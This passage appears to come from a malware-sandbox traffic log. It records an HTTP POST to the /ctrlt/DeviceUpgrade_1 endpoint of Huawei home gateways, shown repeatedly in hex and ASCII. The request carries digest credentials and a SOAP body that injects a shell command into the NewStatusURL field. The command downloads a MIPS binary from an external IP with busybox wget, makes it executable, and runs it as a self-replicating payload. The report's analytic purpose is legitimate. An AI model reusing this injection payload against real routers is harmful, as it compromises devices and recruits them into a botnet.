?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
